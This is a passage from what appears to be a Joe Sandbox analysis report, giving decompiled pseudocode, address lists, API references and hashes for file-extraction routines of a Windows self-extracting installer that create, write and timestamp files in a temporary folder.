                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				struct HWND__* _t37;
                                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				long _t44;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				long _t51;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                                                                                            				int _t75;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                            				_v8 = _t30;
                                                                                                                                                                                                                                            				_t75 = _a8;
                                                                                                                                                                                                                                            				if( *0xa991d8 == 0) {
                                                                                                                                                                                                                                            					_t32 = _a4;
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                            						_t33 = E00A94E99(_t75);
                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                            						return E00A96CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t35 = _t32 - 1;
                                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t36 = _t35 - 1;
                                                                                                                                                                                                                                            					__eflags = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                            						_t37 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t54 = 0xa991e4;
                                                                                                                                                                                                                                            						_t58 = 0xa991e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t38 =  *_t58;
                                                                                                                                                                                                                                            							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                                            						} while (_t38 != 0);
                                                                                                                                                                                                                                            						_t59 = _t58 - 0xa991e5;
                                                                                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                                                                                            						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t39 =  *_t71;
                                                                                                                                                                                                                                            							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                                            						} while (_t39 != 0);
                                                                                                                                                                                                                                            						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                            						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                            							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0xa991e4;
                                                                                                                                                                                                                                            						_t30 = E00A94702( &_v268, 0xa991e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t41 = E00A9476D( &_v268, __eflags);
                                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0x180);
                                                                                                                                                                                                                                            						_t30 = E00A94980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                            						_t75 = _t30;
                                                                                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E00A947E0( &_v268);
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa993f4 =  *0xa993f4 + 1;
                                                                                                                                                                                                                                            						_t33 = _t75;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t44 = _t36 - 1;
                                                                                                                                                                                                                                            					__eflags = _t44;
                                                                                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                                                                                            						_t54 = 0xa991e4;
                                                                                                                                                                                                                                            						_t63 = 0xa991e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t45 =  *_t63;
                                                                                                                                                                                                                                            							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                                            						} while (_t45 != 0);
                                                                                                                                                                                                                                            						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t64 = _t63 - 0xa991e5;
                                                                                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                                                                                            						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t46 =  *_t74;
                                                                                                                                                                                                                                            							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                                            						} while (_t46 != 0);
                                                                                                                                                                                                                                            						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                            						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0xa991e4;
                                                                                                                                                                                                                                            						_t30 = E00A94702( &_v268, 0xa991e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                            						_t30 = E00A94C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						E00A94B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E00A94B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                            0x00a94cd0
                                                                                                                                                                                                                                            0x00a94cdb
                                                                                                                                                                                                                                            0x00a94ce0
                                                                                                                                                                                                                                            0x00a94ce2
                                                                                                                                                                                                                                            0x00a94cee
                                                                                                                                                                                                                                            0x00a94cf2
                                                                                                                                                                                                                                            0x00a94d0e
                                                                                                                                                                                                                                            0x00a94d0e
                                                                                                                                                                                                                                            0x00a94d11
                                                                                                                                                                                                                                            0x00a94e83
                                                                                                                                                                                                                                            0x00a94e88
                                                                                                                                                                                                                                            0x00a94e98
                                                                                                                                                                                                                                            0x00a94e98
                                                                                                                                                                                                                                            0x00a94d17
                                                                                                                                                                                                                                            0x00a94d17
                                                                                                                                                                                                                                            0x00a94d1a
                                                                                                                                                                                                                                            0x00a94d2f
                                                                                                                                                                                                                                            0x00a94d2f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94d2f
                                                                                                                                                                                                                                            0x00a94d1c
                                                                                                                                                                                                                                            0x00a94d1c
                                                                                                                                                                                                                                            0x00a94d1f
                                                                                                                                                                                                                                            0x00a94dcb
                                                                                                                                                                                                                                            0x00a94dd0
                                                                                                                                                                                                                                            0x00a94dd2
                                                                                                                                                                                                                                            0x00a94ddd
                                                                                                                                                                                                                                            0x00a94ddd
                                                                                                                                                                                                                                            0x00a94de3
                                                                                                                                                                                                                                            0x00a94de8
                                                                                                                                                                                                                                            0x00a94ded
                                                                                                                                                                                                                                            0x00a94ded
                                                                                                                                                                                                                                            0x00a94def
                                                                                                                                                                                                                                            0x00a94df0
                                                                                                                                                                                                                                            0x00a94df0
                                                                                                                                                                                                                                            0x00a94df4
                                                                                                                                                                                                                                            0x00a94df4
                                                                                                                                                                                                                                            0x00a94df6
                                                                                                                                                                                                                                            0x00a94df9
                                                                                                                                                                                                                                            0x00a94dfc
                                                                                                                                                                                                                                            0x00a94dfc
                                                                                                                                                                                                                                            0x00a94dfe
                                                                                                                                                                                                                                            0x00a94dff
                                                                                                                                                                                                                                            0x00a94dff
                                                                                                                                                                                                                                            0x00a94e03
                                                                                                                                                                                                                                            0x00a94e08
                                                                                                                                                                                                                                            0x00a94e0a
                                                                                                                                                                                                                                            0x00a94e0f
                                                                                                                                                                                                                                            0x00a94d03
                                                                                                                                                                                                                                            0x00a94d03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94d03
                                                                                                                                                                                                                                            0x00a94e18
                                                                                                                                                                                                                                            0x00a94e20
                                                                                                                                                                                                                                            0x00a94e25
                                                                                                                                                                                                                                            0x00a94e27
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94e33
                                                                                                                                                                                                                                            0x00a94e38
                                                                                                                                                                                                                                            0x00a94e3a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94e40
                                                                                                                                                                                                                                            0x00a94e51
                                                                                                                                                                                                                                            0x00a94e56
                                                                                                                                                                                                                                            0x00a94e5b
                                                                                                                                                                                                                                            0x00a94e5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94e6a
                                                                                                                                                                                                                                            0x00a94e6f
                                                                                                                                                                                                                                            0x00a94e71
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94e77
                                                                                                                                                                                                                                            0x00a94e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94e7d
                                                                                                                                                                                                                                            0x00a94d25
                                                                                                                                                                                                                                            0x00a94d25
                                                                                                                                                                                                                                            0x00a94d28
                                                                                                                                                                                                                                            0x00a94d36
                                                                                                                                                                                                                                            0x00a94d3b
                                                                                                                                                                                                                                            0x00a94d40
                                                                                                                                                                                                                                            0x00a94d40
                                                                                                                                                                                                                                            0x00a94d42
                                                                                                                                                                                                                                            0x00a94d43
                                                                                                                                                                                                                                            0x00a94d43
                                                                                                                                                                                                                                            0x00a94d47
                                                                                                                                                                                                                                            0x00a94d4a
                                                                                                                                                                                                                                            0x00a94d4a
                                                                                                                                                                                                                                            0x00a94d4c
                                                                                                                                                                                                                                            0x00a94d4f
                                                                                                                                                                                                                                            0x00a94d4f
                                                                                                                                                                                                                                            0x00a94d51
                                                                                                                                                                                                                                            0x00a94d52
                                                                                                                                                                                                                                            0x00a94d52
                                                                                                                                                                                                                                            0x00a94d56
                                                                                                                                                                                                                                            0x00a94d5b
                                                                                                                                                                                                                                            0x00a94d5d
                                                                                                                                                                                                                                            0x00a94d62
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94d67
                                                                                                                                                                                                                                            0x00a94d6f
                                                                                                                                                                                                                                            0x00a94d74
                                                                                                                                                                                                                                            0x00a94d76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94d7c
                                                                                                                                                                                                                                            0x00a94d84
                                                                                                                                                                                                                                            0x00a94d89
                                                                                                                                                                                                                                            0x00a94d8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94d94
                                                                                                                                                                                                                                            0x00a94d99
                                                                                                                                                                                                                                            0x00a94d9e
                                                                                                                                                                                                                                            0x00a94da1
                                                                                                                                                                                                                                            0x00a94daa
                                                                                                                                                                                                                                            0x00a94daa
                                                                                                                                                                                                                                            0x00a94da3
                                                                                                                                                                                                                                            0x00a94da3
                                                                                                                                                                                                                                            0x00a94da3
                                                                                                                                                                                                                                            0x00a94db5
                                                                                                                                                                                                                                            0x00a94dbb
                                                                                                                                                                                                                                            0x00a94dbd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94dc3
                                                                                                                                                                                                                                            0x00a94dc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94dc5
                                                                                                                                                                                                                                            0x00a94dbd
                                                                                                                                                                                                                                            0x00a94d2a
                                                                                                                                                                                                                                            0x00a94d2a
                                                                                                                                                                                                                                            0x00a94d2d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94d2d
                                                                                                                                                                                                                                            0x00a94cf8
                                                                                                                                                                                                                                            0x00a94cfd
                                                                                                                                                                                                                                            0x00a94d02
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A94DB5
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A94DDD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                            • API String ID: 3625706803-1610346413
                                                                                                                                                                                                                                            • Opcode ID: 76bc4a8c8058999d8c414e79e96ffb87cc1ae4317e08b7364155576e0fb16012
                                                                                                                                                                                                                                            • Instruction ID: 7d5c163f15a9a508d275863a8d3aa242725cdfbc00f1e489e74d0f9e26e18bc4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76bc4a8c8058999d8c414e79e96ffb87cc1ae4317e08b7364155576e0fb16012
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B41003A3002059ACF259F68DA44EF677E5AF4D304F148669E886A7285DE31DE4BC790
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A94C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0xa98d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0xa98d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a94c40
                                                                                                                                                                                                                                            0x00a94c4a
                                                                                                                                                                                                                                            0x00a94c8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94c70
                                                                                                                                                                                                                                            0x00a94c70
                                                                                                                                                                                                                                            0x00a94c7e
                                                                                                                                                                                                                                            0x00a94c86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94c8a

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A94C54
                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A94C66
                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A94C7E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                            • Opcode ID: 296e14f7f4d6fded04cb61a5ac6d1dd5102d1d91b270b354efe2e7ad19698295
                                                                                                                                                                                                                                            • Instruction ID: 9ac5585b6bc64897e1954f4fdb973bebe1c85b6246c9216b11d857209d89f686
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 296e14f7f4d6fded04cb61a5ac6d1dd5102d1d91b270b354efe2e7ad19698295
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32F0907271120CAF9F64DFB4CC49DBB77ECEB18240B44052BA815C1150EA30D915C7A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A9487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A9490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x00a94880
                                                                                                                                                                                                                                            0x00a9488c
                                                                                                                                                                                                                                            0x00a94894
                                                                                                                                                                                                                                            0x00a948a0
                                                                                                                                                                                                                                            0x00a948c9
                                                                                                                                                                                                                                            0x00a948ce
                                                                                                                                                                                                                                            0x00a948a2
                                                                                                                                                                                                                                            0x00a948a8
                                                                                                                                                                                                                                            0x00a948b7
                                                                                                                                                                                                                                            0x00a948bc
                                                                                                                                                                                                                                            0x00a948aa
                                                                                                                                                                                                                                            0x00a948ac
                                                                                                                                                                                                                                            0x00a948ac
                                                                                                                                                                                                                                            0x00a948a8
                                                                                                                                                                                                                                            0x00a948de
                                                                                                                                                                                                                                            0x00a948e7
                                                                                                                                                                                                                                            0x00a9490b
                                                                                                                                                                                                                                            0x00a948ee
                                                                                                                                                                                                                                            0x00a948f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94902

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A94A23,?,00A94F67,*MEMCAB,00008000,00000180), ref: 00A948DE
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A94F67,*MEMCAB,00008000,00000180), ref: 00A94902
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: f18fc2a2f5b31109e724c2dc69cd4dad46ad8c3f127d662d937c1cd737d1d458
                                                                                                                                                                                                                                            • Instruction ID: c6ae5ec2a510f206636691f70e17665d5bbcd499bffd3e68ab6cd4f8c984c977
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f18fc2a2f5b31109e724c2dc69cd4dad46ad8c3f127d662d937c1cd737d1d458
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67014BA3F1257026F72481694C88FB7559CCB9A735F2B4336FDAAE71D1D5644C0681E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A94AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 =  *0xa9858c; // 0x268
                                                                                                                                                                                                                                            				_t9 = E00A93680(_t20);
                                                                                                                                                                                                                                            				if( *0xa991d8 == 0) {
                                                                                                                                                                                                                                            					_push(_t24);
                                                                                                                                                                                                                                            					_t12 = WriteFile( *(0xa98d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t25 = _a12;
                                                                                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            							_t14 =  *0xa99400; // 0x2e800
                                                                                                                                                                                                                                            							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                            							 *0xa99400 = _t15;
                                                                                                                                                                                                                                            							if( *0xa98184 != 0) {
                                                                                                                                                                                                                                            								_t21 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa993f8, 0);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a94ad5
                                                                                                                                                                                                                                            0x00a94adb
                                                                                                                                                                                                                                            0x00a94ae7
                                                                                                                                                                                                                                            0x00a94aee
                                                                                                                                                                                                                                            0x00a94b05
                                                                                                                                                                                                                                            0x00a94b0d
                                                                                                                                                                                                                                            0x00a94b14
                                                                                                                                                                                                                                            0x00a94b1a
                                                                                                                                                                                                                                            0x00a94b1c
                                                                                                                                                                                                                                            0x00a94b21
                                                                                                                                                                                                                                            0x00a94b2a
                                                                                                                                                                                                                                            0x00a94b2f
                                                                                                                                                                                                                                            0x00a94b31
                                                                                                                                                                                                                                            0x00a94b39
                                                                                                                                                                                                                                            0x00a94b54
                                                                                                                                                                                                                                            0x00a94b54
                                                                                                                                                                                                                                            0x00a94b39
                                                                                                                                                                                                                                            0x00a94b2f
                                                                                                                                                                                                                                            0x00a94b0f
                                                                                                                                                                                                                                            0x00a94b0f
                                                                                                                                                                                                                                            0x00a94b0f
                                                                                                                                                                                                                                            0x00a94b5e
